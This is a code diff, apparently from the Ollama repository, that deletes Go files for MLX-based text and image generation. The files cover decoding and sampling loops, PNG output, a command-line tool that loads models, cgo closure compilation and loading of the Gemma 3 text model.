"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
// Dedicated stream for generation (like mlx-lm's generation_stream)
var generationStream *mlx.Stream
// utf8Streamer buffers decoded text and emits only complete UTF-8 characters.
// This handles cases where tokenizers output partial multi-byte sequences.
type utf8Streamer struct {
buffer []byte
}
// Write adds decoded text to the buffer and returns complete UTF-8 characters.
func (s *utf8Streamer) Write(text string) string {
s.buffer = append(s.buffer, text...)
// Find the last position that ends with a complete UTF-8 character
validLen := 0
for i := 0; i < len(s.buffer); {
r, size := utf8.DecodeRune(s.buffer[i:])
if r == utf8.RuneError && size == 1 {
// Invalid or incomplete UTF-8 sequence at this position
// Check if it could be a valid start of a multi-byte sequence
if len(s.buffer)-i < 4 {
// Might be incomplete, keep it in buffer
break
}
// Definitely invalid, skip this byte
i++
validLen = i
} else {
i += size
validLen = i
}
}
if validLen == 0 {
return ""
}
result := string(s.buffer[:validLen])
s.buffer = s.buffer[validLen:]
return result
}
// Flush returns any remaining buffered bytes (may be incomplete UTF-8).
func (s *utf8Streamer) Flush() string {
if len(s.buffer) == 0 {
return ""
}
result := string(s.buffer)
s.buffer = nil
return result
}
func init() {
generationStream = mlx.NewStream()
}
// withStream runs fn with the generation stream as default
func withStream(fn func()) {
orig := mlx.GetDefaultStream()
mlx.SetDefaultStream(generationStream)
fn()
mlx.SetDefaultStream(orig)
}
type Model interface {
Tokenizer() *tokenizer.Tokenizer
VocabSize() int32
NewCache(maxSeqLen int32) []cache.Cache
Forward(input *mlx.Array, caches []cache.Cache) *mlx.Array
}
// ChatModel is an optional interface for models that support chat formatting
type ChatModel interface {
FormatPrompt(prompt string) string
}
// MultimodalModel is for models that support image input
type MultimodalModel interface {
Model
FormatPromptWithImage(prompt string) string
ExpandImageTokens(tokens []int32) []int32
ForwardWithImage(tokens *mlx.Array, image *mlx.Array, caches []cache.Cache) *mlx.Array
ImageSize() int32 // Returns expected image size for preprocessing
}
// ImageLoader loads and preprocesses an image for multimodal models
// Returns nil if path is empty
type ImageLoader func(path string, imageSize int32) (*mlx.Array, error)
type input struct {
Prompt string
Image *mlx.Array // Optional preprocessed image for multimodal models
MaxTokens int
Temperature float32
TopP float32
TopK int
WiredLimitGB int // Metal wired memory limit in GB (default 32)
}
type output struct {
Text string
Done bool
PrefillTokSec float64
GenTokSec float64
}
// Decoder wraps model + cache for autoregressive generation.
type Decoder struct {
model Model
caches []cache.Cache
vocabSize int32
temp float32
topK int
topP float32
token *mlx.Array // Current token (kept across pools)
oldCacheState []*mlx.Array // Preallocated slice for old cache state
image *mlx.Array // Optional image for multimodal prefill
}
func NewDecoder(m Model, temp float32, topK int, topP float32) *Decoder {
caches := m.NewCache(0)
return &Decoder{
model: m,
caches: caches,
vocabSize: m.VocabSize(),
temp: temp,
topK: topK,
topP: topP,
oldCacheState: make([]*mlx.Array, 0, len(caches)*2),
}
}
// SetImage sets the image for multimodal prefill (call before prefill)
func (d *Decoder) SetImage(img *mlx.Array) {
d.image = img
}
func (d *Decoder) prefill(inputIDs []int32) int {
processed := 0
// Track old cache state to free after each chunk
var oldCacheState []*mlx.Array
// For multimodal models with an image, we need to process all tokens together
// in the first forward pass so the image embeddings can be inserted properly.
// Skip chunking for multimodal prefill.
isMultimodal := d.image != nil
// Process all-but-1 tokens in chunks, eval cache state for memory management
// Skip chunking for multimodal - process everything in the final step
if !isMultimodal {
for len(inputIDs) > 1 {
chunkSize := min(2048, len(inputIDs)-1)
if chunkSize <= 0 {
break
}
chunk := inputIDs[:chunkSize]
// Save old cache state before forward
oldCacheState = oldCacheState[:0]
for _, c := range d.caches {
oldCacheState = append(oldCacheState, c.State()...)
}
var cacheState []*mlx.Array
withStream(func() {
x := mlx.NewArrayInt32(chunk, []int32{1, int32(len(chunk))})
d.model.Forward(x, d.caches)
for _, c := range d.caches {
cacheState = append(cacheState, c.State()...)
}
})
mlx.Eval(cacheState...)
// Free old cache state
for _, arr := range oldCacheState {
if arr != nil {
arr.Free()
}
}
inputIDs = inputIDs[chunkSize:]
processed += chunkSize
}
}
// Save old cache state before final step
oldCacheState = oldCacheState[:0]
for _, c := range d.caches {
oldCacheState = append(oldCacheState, c.State()...)
}
// Final token + sampling (or all tokens for multimodal)
withStream(func() {
x := mlx.NewArrayInt32(inputIDs, []int32{1, int32(len(inputIDs))})
mlx.Eval(x) // Materialize before any other evals
var logits *mlx.Array
// Use ForwardWithImage if we have an image and model supports it
if d.image != nil {
if mm, ok := d.model.(MultimodalModel); ok {
logits = mm.ForwardWithImage(x, d.image, d.caches)
d.image = nil // Only use image for first forward
} else {
logits = d.model.Forward(x, d.caches)
}
} else {
logits = d.model.Forward(x, d.caches)
}
d.token = sample(logits, d.temp, d.topK, d.topP, d.vocabSize)
})
// Keep cache state (token auto-kept by AsyncEval)
for _, c := range d.caches {
mlx.Keep(c.State()...)
}
mlx.AsyncEval(d.token)
// Free old cache state from before final step
for _, arr := range oldCacheState {
if arr != nil {
arr.Free()
}
}
mlx.ClearCache()
return processed + len(inputIDs)
}
func (d *Decoder) step() int32 {
prevToken := d.token
// Save old cache state (reuse preallocated slice)
d.oldCacheState = d.oldCacheState[:0]
for _, c := range d.caches {
d.oldCacheState = append(d.oldCacheState, c.State()...)
}
withStream(func() {
logits := d.model.Forward(mlx.Reshape(prevToken, 1, 1), d.caches)
d.token = sample(logits, d.temp, d.topK, d.topP, d.vocabSize)
})
// Keep token and new cache state so they survive cleanup
mlx.Keep(d.token)
for _, c := range d.caches {
mlx.Keep(c.State()...)
}
mlx.AsyncEval(d.token)
// Sync on previous token (GPU already working on next step)
val := prevToken.ItemInt32()
// Free old token and old cache state
prevToken.Free()
for _, arr := range d.oldCacheState {
arr.Free()
}
return val
}
func generate(ctx context.Context, m Model, in input, cb func(output)) error {
mlx.EnableCompile()
wiredLimit := in.WiredLimitGB
if wiredLimit <= 0 {
wiredLimit = 32 // default 32GB
}
mlx.MetalSetWiredLimit(uint64(wiredLimit) << 30)
temp := in.Temperature
if temp < 0 {
temp = 0.7
}
tok := m.Tokenizer()
dec := NewDecoder(m, temp, in.TopK, in.TopP)
// Apply chat template - use image template if we have an image
prompt := in.Prompt
var tokens []int32
if mm, ok := m.(MultimodalModel); ok && in.Image != nil {
prompt = mm.FormatPromptWithImage(prompt)
tokens = tok.Encode(prompt, true)
tokens = mm.ExpandImageTokens(tokens) // Expand <start_of_image> to 256 image tokens
dec.SetImage(in.Image)
} else if cm, ok := m.(ChatModel); ok {
prompt = cm.FormatPrompt(prompt)
tokens = tok.Encode(prompt, true)
} else {
tokens = tok.Encode(prompt, true)
}
prefillStart := time.Now()
prefillTokens := dec.prefill(tokens)
// Prefill measurement should include time to first token (like mlx-lm)
// Step() waits for prefill to complete and returns first token
firstToken := dec.step()
prefillTokSec := float64(prefillTokens) / time.Since(prefillStart).Seconds()
genStart := time.Now()
maxTokens := max(in.MaxTokens, 100)
var genTokens int
// UTF-8 streamer to handle partial multi-byte characters
streamer := &utf8Streamer{}
// Handle first token
genTokens++
if tok.IsEOS(firstToken) {
cb(output{Done: true, PrefillTokSec: prefillTokSec, GenTokSec: 0})
return nil
}
if text := streamer.Write(tok.Decode([]int32{firstToken})); text != "" {
cb(output{Text: text})
}
for n := 1; n < maxTokens; n++ {
if ctx.Err() != nil {
return ctx.Err()
}
token := dec.step()
genTokens++
if tok.IsEOS(token) {
break
}
if text := streamer.Write(tok.Decode([]int32{token})); text != "" {
cb(output{Text: text})
}
if n%256 == 0 {
mlx.ClearCache()
}
}
// Flush any remaining buffered bytes
if text := streamer.Flush(); text != "" {
cb(output{Text: text})
}
fmt.Printf("\nPeak memory: %.2fGB\n", float64(mlx.MetalGetPeakMemory())/(1<<30))
cb(output{Done: true, PrefillTokSec: prefillTokSec,
GenTokSec: float64(genTokens) / time.Since(genStart).Seconds()})
return nil
}

View File

@@ -1,89 +0,0 @@
//go:build mlx
package main
import (
"fmt"
"image"
"image/png"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// saveImageArray saves an MLX array as a PNG image.
// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
func saveImageArray(arr *mlx.Array, path string) error {
img, err := arrayToImage(arr)
if err != nil {
return err
}
return savePNG(img, path)
}
func savePNG(img *image.RGBA, path string) error {
if filepath.Ext(path) != ".png" {
path = path + ".png"
}
f, err := os.Create(path)
if err != nil {
return err
}
defer f.Close()
return png.Encode(f, img)
}
func arrayToImage(arr *mlx.Array) (*image.RGBA, error) {
shape := arr.Shape()
if len(shape) != 4 {
return nil, fmt.Errorf("expected 4D array [B, C, H, W], got %v", shape)
}
// Transform to [H, W, C] for image conversion
img := mlx.Squeeze(arr, 0)
arr.Free()
img = mlx.Transpose(img, 1, 2, 0)
img = mlx.Contiguous(img)
mlx.Eval(img)
imgShape := img.Shape()
H := int(imgShape[0])
W := int(imgShape[1])
C := int(imgShape[2])
if C != 3 {
img.Free()
return nil, fmt.Errorf("expected 3 channels (RGB), got %d", C)
}
// Copy to CPU and free GPU memory
data := img.Data()
img.Free()
// Write directly to Pix slice (faster than SetRGBA)
goImg := image.NewRGBA(image.Rect(0, 0, W, H))
pix := goImg.Pix
for y := 0; y < H; y++ {
for x := 0; x < W; x++ {
srcIdx := (y*W + x) * C
dstIdx := (y*W + x) * 4
pix[dstIdx+0] = uint8(clampF(data[srcIdx+0]*255+0.5, 0, 255))
pix[dstIdx+1] = uint8(clampF(data[srcIdx+1]*255+0.5, 0, 255))
pix[dstIdx+2] = uint8(clampF(data[srcIdx+2]*255+0.5, 0, 255))
pix[dstIdx+3] = 255
}
}
return goImg, nil
}
func clampF(v, min, max float32) float32 {
if v < min {
return min
}
if v > max {
return max
}
return v
}

View File

@@ -1,286 +0,0 @@
//go:build mlx
package main
import (
"context"
"encoding/json"
"flag"
"fmt"
"log"
"os"
"path/filepath"
"runtime/pprof"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/models/gemma3"
"github.com/ollama/ollama/x/imagegen/models/gpt_oss"
"github.com/ollama/ollama/x/imagegen/models/llama"
"github.com/ollama/ollama/x/imagegen/models/qwen_image"
"github.com/ollama/ollama/x/imagegen/models/qwen_image_edit"
"github.com/ollama/ollama/x/imagegen/models/zimage"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// stringSlice is a flag type that accumulates multiple values
type stringSlice []string
func (s *stringSlice) String() string {
return fmt.Sprintf("%v", *s)
}
func (s *stringSlice) Set(value string) error {
*s = append(*s, value)
return nil
}
func main() {
modelPath := flag.String("model", "", "Model directory")
prompt := flag.String("prompt", "Hello", "Prompt")
// Text generation params
maxTokens := flag.Int("max-tokens", 100, "Max tokens")
temperature := flag.Float64("temperature", 0.7, "Temperature")
topP := flag.Float64("top-p", 0.9, "Top-p sampling")
topK := flag.Int("top-k", 40, "Top-k sampling")
imagePath := flag.String("image", "", "Image path for multimodal models")
// Image generation params
width := flag.Int("width", 1024, "Image width")
height := flag.Int("height", 1024, "Image height")
steps := flag.Int("steps", 9, "Denoising steps")
seed := flag.Int64("seed", 42, "Random seed")
out := flag.String("output", "output.png", "Output path")
// Utility flags
listTensors := flag.Bool("list", false, "List tensors only")
cpuProfile := flag.String("cpuprofile", "", "Write CPU profile to file")
gpuCapture := flag.String("gpu-capture", "", "Capture GPU trace to .gputrace file (run with MTL_CAPTURE_ENABLED=1)")
layerCache := flag.Bool("layer-cache", false, "Enable layer caching for faster diffusion (Z-Image, Qwen-Image). Not compatible with CFG/negative prompts.")
wiredLimitGB := flag.Int("wired-limit", 32, "Metal wired memory limit in GB")
// Legacy mode flags
zimageFlag := flag.Bool("zimage", false, "Z-Image generation")
qwenImage := flag.Bool("qwen-image", false, "Qwen-Image text-to-image generation")
qwenImageEdit := flag.Bool("qwen-image-edit", false, "Qwen-Image-Edit image editing")
var inputImages stringSlice
flag.Var(&inputImages, "input-image", "Input image for image editing (can be specified multiple times)")
negativePrompt := flag.String("negative-prompt", "", "Negative prompt for CFG (empty = no CFG, matching Python)")
cfgScale := flag.Float64("cfg-scale", 4.0, "CFG scale for image editing")
flag.Parse()
if *modelPath == "" {
flag.Usage()
return
}
// CPU profiling
if *cpuProfile != "" {
f, err := os.Create(*cpuProfile)
if err != nil {
log.Fatal(err)
}
defer f.Close()
if err := pprof.StartCPUProfile(f); err != nil {
log.Fatal(err)
}
defer pprof.StopCPUProfile()
}
var err error
// Handle legacy mode flags that aren't unified yet
switch {
case *zimageFlag:
m := &zimage.Model{}
if loadErr := m.Load(*modelPath); loadErr != nil {
log.Fatal(loadErr)
}
var img *mlx.Array
img, err = m.GenerateFromConfig(&zimage.GenerateConfig{
Prompt: *prompt,
Width: int32(*width),
Height: int32(*height),
Steps: *steps,
Seed: *seed,
CapturePath: *gpuCapture,
LayerCache: *layerCache,
})
if err == nil {
err = saveImageArray(img, *out)
}
case *qwenImage:
m, loadErr := qwen_image.LoadPersistent(*modelPath)
if loadErr != nil {
log.Fatal(loadErr)
}
var img *mlx.Array
img, err = m.GenerateFromConfig(&qwen_image.GenerateConfig{
Prompt: *prompt,
NegativePrompt: *negativePrompt,
CFGScale: float32(*cfgScale),
Width: int32(*width),
Height: int32(*height),
Steps: *steps,
Seed: *seed,
LayerCache: *layerCache,
})
if err == nil {
err = saveImageArray(img, *out)
}
case *qwenImageEdit:
if len(inputImages) == 0 {
log.Fatal("qwen-image-edit requires at least one -input-image")
}
m, loadErr := qwen_image_edit.LoadPersistent(*modelPath)
if loadErr != nil {
log.Fatal(loadErr)
}
// For image editing, use 0 for dimensions to auto-detect from input image
// unless explicitly overridden from defaults
editWidth := int32(0)
editHeight := int32(0)
if *width != 1024 {
editWidth = int32(*width)
}
if *height != 1024 {
editHeight = int32(*height)
}
cfg := &qwen_image_edit.GenerateConfig{
Prompt: *prompt,
NegativePrompt: *negativePrompt,
CFGScale: float32(*cfgScale),
Width: editWidth,
Height: editHeight,
Steps: *steps,
Seed: *seed,
}
var img *mlx.Array
img, err = m.EditFromConfig(inputImages, cfg)
if err == nil {
err = saveImageArray(img, *out)
}
case *listTensors:
err = listModelTensors(*modelPath)
default:
// llm path
m, err := load(*modelPath)
if err != nil {
log.Fatal(err)
}
// Load image if provided and model supports it
var image *mlx.Array
if *imagePath != "" {
if mm, ok := m.(interface{ ImageSize() int32 }); ok {
image, err = gemma3.ProcessImage(*imagePath, mm.ImageSize())
if err != nil {
log.Fatal("load image:", err)
}
} else {
log.Fatal("model does not support image input")
}
}
err = generate(context.Background(), m, input{
Prompt: *prompt,
Image: image,
MaxTokens: *maxTokens,
Temperature: float32(*temperature),
TopP: float32(*topP),
TopK: *topK,
WiredLimitGB: *wiredLimitGB,
}, func(out output) {
if out.Text != "" {
fmt.Print(out.Text)
}
if out.Done {
fmt.Printf("\n\n[prefill: %.1f tok/s, gen: %.1f tok/s]\n", out.PrefillTokSec, out.GenTokSec)
}
})
}
if err != nil {
log.Fatal(err)
}
}
func listModelTensors(modelPath string) error {
weights, err := safetensors.LoadModelWeights(modelPath)
if err != nil {
return err
}
for _, name := range weights.ListTensors() {
info, _ := weights.GetTensorInfo(name)
fmt.Printf("%s: %v (%s)\n", name, info.Shape, info.Dtype)
}
return nil
}
// loadModel builds and evaluates a model using the common load pattern.
// Release safetensors BEFORE eval - lazy arrays have captured their data,
// and this reduces peak memory by ~6GB (matches mlx-lm behavior).
func loadModel[T Model](build func() T, cleanup func()) T {
m := build()
weights := mlx.Collect(m)
cleanup()
mlx.Eval(weights...)
return m
}
func load(modelPath string) (Model, error) {
kind, err := detectModelKind(modelPath)
if err != nil {
return nil, fmt.Errorf("detect model kind: %w", err)
}
switch kind {
case "gpt_oss":
return gpt_oss.Load(modelPath)
case "gemma3":
return gemma3.Load(modelPath)
case "gemma3_text":
return gemma3.LoadText(modelPath)
default:
return llama.Load(modelPath)
}
}
func detectModelKind(modelPath string) (string, error) {
indexPath := filepath.Join(modelPath, "model_index.json")
if _, err := os.Stat(indexPath); err == nil {
data, err := os.ReadFile(indexPath)
if err != nil {
return "zimage", nil
}
var index struct {
ClassName string `json:"_class_name"`
}
if err := json.Unmarshal(data, &index); err == nil {
switch index.ClassName {
case "FluxPipeline", "ZImagePipeline":
return "zimage", nil
}
}
return "zimage", nil
}
configPath := filepath.Join(modelPath, "config.json")
data, err := os.ReadFile(configPath)
if err != nil {
return "", fmt.Errorf("no config.json or model_index.json found: %w", err)
}
var cfg struct {
ModelType string `json:"model_type"`
}
if err := json.Unmarshal(data, &cfg); err != nil {
return "", fmt.Errorf("parse config.json: %w", err)
}
return cfg.ModelType, nil
}

View File

@@ -1,49 +0,0 @@
//go:build mlx
package main
import "github.com/ollama/ollama/x/imagegen/mlx"
// sampleTopK samples from top-k logits using global random state
func sampleTopK(scaledLogits *mlx.Array, k int) *mlx.Array {
neg := mlx.Neg(scaledLogits)
indices := mlx.Argpartition(neg, k-1, -1)
topKIdx := mlx.Slice(indices, []int32{0}, []int32{int32(k)})
values := mlx.TakeAlongAxis(scaledLogits, topKIdx, -1)
sampled := mlx.RandomCategorical(values, -1, 1)
return mlx.Take(topKIdx, sampled, -1)
}
// sampleTopP samples using nucleus sampling with global random state
func sampleTopP(scaledLogits *mlx.Array, p float32, vocabSize int32) *mlx.Array {
sorted := mlx.Argsort(mlx.Neg(scaledLogits), -1)
sortedLogits := mlx.TakeAlongAxis(scaledLogits, sorted, -1)
probs := mlx.Softmax(sortedLogits, -1)
cumProbs := mlx.Cumsum(probs, -1)
mask := mlx.LessScalar(cumProbs, p)
negInf := mlx.FullDtype(float32(-1e9), scaledLogits.Dtype(), vocabSize)
masked := mlx.Where(mask, sortedLogits, negInf)
sampled := mlx.RandomCategorical(masked, -1, 1)
return mlx.Take(sorted, sampled, -1)
}
// sample samples from logits at the last position
func sample(logits *mlx.Array, temp float32, topK int, topP float32, vocab int32) *mlx.Array {
// Get last position logits: [1, L, vocab] -> [vocab]
shape := logits.Shape()
seqLen := shape[1]
lastLogits := mlx.Slice(logits, []int32{0, seqLen - 1, 0}, []int32{1, seqLen, vocab})
lastLogits = mlx.Reshape(lastLogits, vocab)
if temp == 0 {
return mlx.Argmax(lastLogits, -1, false)
}
scaled := mlx.DivScalar(lastLogits, temp)
if topK > 0 && topK < int(vocab) {
return sampleTopK(scaled, topK)
}
if topP > 0 && topP < 1.0 {
return sampleTopP(scaled, topP, vocab)
}
return mlx.RandomCategorical(scaled, -1, 1)
}

View File

@@ -1,46 +0,0 @@
# MLX Memory Management
| This package will get consolidated with `x/ml/backend/mlx` in the future.
## Automatic Tracking
All arrays are automatically tracked when created. On `Eval()`, non-kept arrays are freed.
### API
```go
result := mlx.Matmul(x, w) // arrays automatically tracked
mlx.Eval(result) // free non-kept, eval result (auto-kept)
```
### Key Functions
- `mlx.Eval(outputs...)` - free non-kept arrays, then evaluate (outputs auto-kept)
- `mlx.AsyncEval(outputs...)` - async version of Eval (outputs auto-kept)
- `mlx.Keep(arrays...)` - mark arrays to survive cleanup (for weights, caches)
- `array.Free()` - mark array for cleanup on next Eval
### Loop Pattern
```go
for step := 0; step < maxTokens; step++ {
logits := model.Forward(token, caches)
oldToken := token
token = sample(logits)
// Keep cache state across iterations
for _, c := range caches {
mlx.Keep(c.State()...)
}
oldToken.Free() // mark for cleanup
mlx.AsyncEval(token) // frees old, evals new
}
```
### Notes
- `Eval()` and `AsyncEval()` auto-keep their outputs
- `Free()` marks for cleanup - actual free happens during next Eval
- Use `Keep()` for weights and cache state that must survive multiple Eval cycles
- Arrays created inside compiled closures are managed by MLX, not tracked

View File

@@ -1,173 +0,0 @@
//go:build mlx
package mlx
/*
#include "mlx/c/mlx.h"
#include <stdlib.h>
// Forward declaration for Go callback
extern int goClosureCallback(mlx_vector_array* res, mlx_vector_array input, void* payload);
// Destructor for payload (Go handle)
extern void goClosureDestructor(void* payload);
*/
import "C"
import (
"runtime/cgo"
"sync"
"unsafe"
)
// inClosureCallback is set to true during closure callback execution.
var inClosureCallback bool
var closureCallbackMu sync.Mutex
// InClosureCallback returns true if we're currently executing inside a closure callback.
func InClosureCallback() bool {
closureCallbackMu.Lock()
defer closureCallbackMu.Unlock()
return inClosureCallback
}
// CompiledFunc is a compiled MLX function that can be called efficiently.
// All intermediate arrays during execution stay inside MLX - only inputs
// and outputs cross the Go boundary.
type CompiledFunc struct {
closure C.mlx_closure
compiled C.mlx_closure
}
// ClosureFunc is the signature for functions that can be compiled.
// It takes a slice of input arrays and returns a slice of output arrays.
type ClosureFunc func(inputs []*Array) []*Array
// Compile compiles a Go function into an optimized MLX closure.
// The function is traced once during compilation, then subsequent calls
// run the optimized graph without creating Go intermediate arrays.
//
// Example:
//
// compiled := mlx.Compile(func(inputs []*mlx.Array) []*mlx.Array {
// a, b := inputs[0], inputs[1]
// c := mlx.Add(a, b)
// d := mlx.Mul(c, c)
// return []*mlx.Array{d}
// })
// defer compiled.Free()
//
// result := compiled.Call(x, y)[0]
func Compile(fn ClosureFunc) *CompiledFunc {
return CompileShapeless(fn, false)
}
// CompileShapeless compiles with optional shapeless mode.
// If shapeless=true, the function works for any input shape after tracing.
func CompileShapeless(fn ClosureFunc, shapeless bool) *CompiledFunc {
// Create a cgo.Handle to prevent the Go function from being GC'd
handle := cgo.NewHandle(fn)
// Create the closure from the Go callback
closure := C.mlx_closure_new_func_payload(
(*[0]byte)(C.goClosureCallback),
unsafe.Pointer(handle),
(*[0]byte)(C.goClosureDestructor),
)
// Compile the closure
compiled := C.mlx_closure_new()
C.mlx_compile(&compiled, closure, C.bool(shapeless))
return &CompiledFunc{
closure: closure,
compiled: compiled,
}
}
// Call invokes the compiled function with the given inputs.
func (cf *CompiledFunc) Call(inputs ...*Array) []*Array {
// Pack inputs into vector
inputVec := C.mlx_vector_array_new()
for _, arr := range inputs {
C.mlx_vector_array_append_value(inputVec, arr.c)
}
// Apply compiled closure
outputVec := C.mlx_vector_array_new()
C.mlx_closure_apply(&outputVec, cf.compiled, inputVec)
C.mlx_vector_array_free(inputVec)
// Unpack outputs
numOutputs := int(C.mlx_vector_array_size(outputVec))
outputs := make([]*Array, numOutputs)
for i := 0; i < numOutputs; i++ {
var arr C.mlx_array
C.mlx_vector_array_get(&arr, outputVec, C.size_t(i))
outputs[i] = newArray(arr)
}
C.mlx_vector_array_free(outputVec)
return outputs
}
// CallEval invokes the compiled function and evaluates the results.
func (cf *CompiledFunc) CallEval(inputs ...*Array) []*Array {
outputs := cf.Call(inputs...)
Eval(outputs...)
return outputs
}
// Free releases the compiled function resources.
func (cf *CompiledFunc) Free() {
C.mlx_closure_free(cf.compiled)
C.mlx_closure_free(cf.closure)
}
// borrowArray wraps a C array WITHOUT setting up GC cleanup.
// Use this for arrays we don't own (e.g., borrowed references in callbacks).
func borrowArray(array C.mlx_array) *Array {
return &Array{c: array}
}
//export goClosureCallback
func goClosureCallback(res *C.mlx_vector_array, input C.mlx_vector_array, payload unsafe.Pointer) C.int {
// Set flag to disable AddCleanup during callback
closureCallbackMu.Lock()
inClosureCallback = true
closureCallbackMu.Unlock()
defer func() {
closureCallbackMu.Lock()
inClosureCallback = false
closureCallbackMu.Unlock()
}()
// Recover the Go function from the handle
handle := cgo.Handle(payload)
fn := handle.Value().(ClosureFunc)
// Convert input vector to Go slice - use borrowArray since MLX owns these
numInputs := int(C.mlx_vector_array_size(input))
inputs := make([]*Array, numInputs)
for i := 0; i < numInputs; i++ {
var arr C.mlx_array
C.mlx_vector_array_get(&arr, input, C.size_t(i))
inputs[i] = borrowArray(arr) // Don't set up cleanup - MLX owns these
}
// Call the Go function
outputs := fn(inputs)
// Build output vector
*res = C.mlx_vector_array_new()
for _, arr := range outputs {
C.mlx_vector_array_append_value(*res, arr.c)
}
return 0
}
//export goClosureDestructor
func goClosureDestructor(payload unsafe.Pointer) {
handle := cgo.Handle(payload)
handle.Delete()
}

View File

File diff suppressed because it is too large Load Diff

View File

File diff suppressed because it is too large Load Diff

View File

@@ -1,614 +0,0 @@
//go:build mlx
package gemma3
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
"github.com/ollama/ollama/x/imagegen/safetensors"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
// TextConfig holds configuration for the text model
type TextConfig struct {
HiddenSize int32 `json:"hidden_size"`
NumHiddenLayers int32 `json:"num_hidden_layers"`
IntermediateSize int32 `json:"intermediate_size"`
NumAttentionHeads int32 `json:"num_attention_heads"`
NumKeyValueHeads int32 `json:"num_key_value_heads"`
HeadDim int32 `json:"head_dim"`
VocabSize int32 `json:"vocab_size"`
RMSNormEps float32 `json:"rms_norm_eps"`
RopeTheta float32 `json:"rope_theta"`
RopeLocalBaseFreq float32 `json:"rope_local_base_freq"`
MaxPositionEmbeddings int32 `json:"max_position_embeddings"`
SlidingWindow int32 `json:"sliding_window"`
SlidingWindowPattern int32 `json:"sliding_window_pattern"`
// Computed fields
Scale float32 `json:"-"`
}
// TextModel is the Gemma 3 text-only model
type TextModel struct {
EmbedTokens *nn.Embedding `weight:"model.embed_tokens"`
Layers []*DecoderLayer `weight:"model.layers"`
Norm *nn.RMSNorm `weight:"model.norm"`
Output *nn.Linear `weight:"-"` // Tied to EmbedTokens, set manually
// Precomputed (1 + weight) for Gemma-style RMSNorm to avoid allocation per forward
NormScaled *mlx.Array `weight:"-"`
tok *tokenizer.Tokenizer
*TextConfig
}
// DecoderLayer is a single transformer block
type DecoderLayer struct {
InputNorm *nn.RMSNorm `weight:"input_layernorm"`
Attention *Attention
PostAttnNorm *nn.RMSNorm `weight:"post_attention_layernorm"`
PreFFNorm *nn.RMSNorm `weight:"pre_feedforward_layernorm"`
MLP *MLP
PostFFNorm *nn.RMSNorm `weight:"post_feedforward_layernorm"`
// Precomputed (1 + weight) for Gemma-style RMSNorm
InputNormScaled *mlx.Array `weight:"-"`
PostAttnNormScaled *mlx.Array `weight:"-"`
PreFFNormScaled *mlx.Array `weight:"-"`
PostFFNormScaled *mlx.Array `weight:"-"`
// Whether this layer uses sliding window attention
IsSliding bool
LayerIdx int32
}
// Attention implements Gemma 3 attention with Q/K normalization
type Attention struct {
QProj *nn.Linear `weight:"self_attn.q_proj"`
KProj *nn.Linear `weight:"self_attn.k_proj"`
VProj *nn.Linear `weight:"self_attn.v_proj"`
OProj *nn.Linear `weight:"self_attn.o_proj"`
QNorm *nn.RMSNorm `weight:"self_attn.q_norm"`
KNorm *nn.RMSNorm `weight:"self_attn.k_norm"`
// Precomputed (1 + weight) for Gemma-style RMSNorm
QNormScaled *mlx.Array `weight:"-"`
KNormScaled *mlx.Array `weight:"-"`
}
// MLP is the feed-forward network with GELU activation
type MLP struct {
GateProj *nn.Linear `weight:"mlp.gate_proj"`
UpProj *nn.Linear `weight:"mlp.up_proj"`
DownProj *nn.Linear `weight:"mlp.down_proj"`
}
// LoadText loads the text-only Gemma 3 model
func LoadText(modelPath string) (*TextModel, error) {
data, err := os.ReadFile(filepath.Join(modelPath, "config.json"))
if err != nil {
return nil, fmt.Errorf("load config: %w", err)
}
var cfg TextConfig
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
// Compute scale
cfg.Scale = float32(1.0 / math.Sqrt(float64(cfg.HeadDim)))
// Set defaults if not specified
if cfg.RopeTheta == 0 {
cfg.RopeTheta = 1000000
}
if cfg.RopeLocalBaseFreq == 0 {
cfg.RopeLocalBaseFreq = 10000
}
if cfg.RMSNormEps == 0 {
cfg.RMSNormEps = 1e-6
}
weights, err := safetensors.LoadModelWeights(modelPath)
if err != nil {
return nil, fmt.Errorf("load weights: %w", err)
}
tok, err := tokenizer.Load(filepath.Join(modelPath, "tokenizer.json"))
if err != nil {
return nil, fmt.Errorf("load tokenizer: %w", err)
}
m := &TextModel{
Layers: make([]*DecoderLayer, cfg.NumHiddenLayers),
TextConfig: &cfg,
tok: tok,
}
// Initialize layer metadata
for i := range m.Layers {
m.Layers[i] = &DecoderLayer{
LayerIdx: int32(i),
IsSliding: isLayerSliding(int32(i), cfg.SlidingWindowPattern),
}
}
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return nil, err
}
// Tied embeddings for output
m.Output = nn.NewLinear(m.EmbedTokens.Weight, nil)
mlx.Eval(mlx.Collect(m)...)
weights.ReleaseAll()
// Precompute (1 + weight) for Gemma-style RMSNorm to avoid per-forward allocation
precomputeGemmaScaledWeights(m)
return m, nil
}
// precomputeGemmaScaledWeights computes (1 + weight) for all RMSNorm layers
// This avoids creating temporary arrays on every forward pass
func precomputeGemmaScaledWeights(m *TextModel) {
m.NormScaled = mlx.AddScalar(m.Norm.Weight, 1.0)
for _, layer := range m.Layers {
layer.InputNormScaled = mlx.AddScalar(layer.InputNorm.Weight, 1.0)
layer.PostAttnNormScaled = mlx.AddScalar(layer.PostAttnNorm.Weight, 1.0)
layer.PreFFNormScaled = mlx.AddScalar(layer.PreFFNorm.Weight, 1.0)
layer.PostFFNormScaled = mlx.AddScalar(layer.PostFFNorm.Weight, 1.0)
layer.Attention.QNormScaled = mlx.AddScalar(layer.Attention.QNorm.Weight, 1.0)
layer.Attention.KNormScaled = mlx.AddScalar(layer.Attention.KNorm.Weight, 1.0)
}
// Eval all the precomputed weights
var scaled []*mlx.Array
scaled = append(scaled, m.NormScaled)
for _, layer := range m.Layers {
scaled = append(scaled, layer.InputNormScaled, layer.PostAttnNormScaled,
layer.PreFFNormScaled, layer.PostFFNormScaled,
layer.Attention.QNormScaled, layer.Attention.KNormScaled)
}
mlx.Eval(scaled...)
}
// isLayerSliding determines if a layer uses sliding window attention
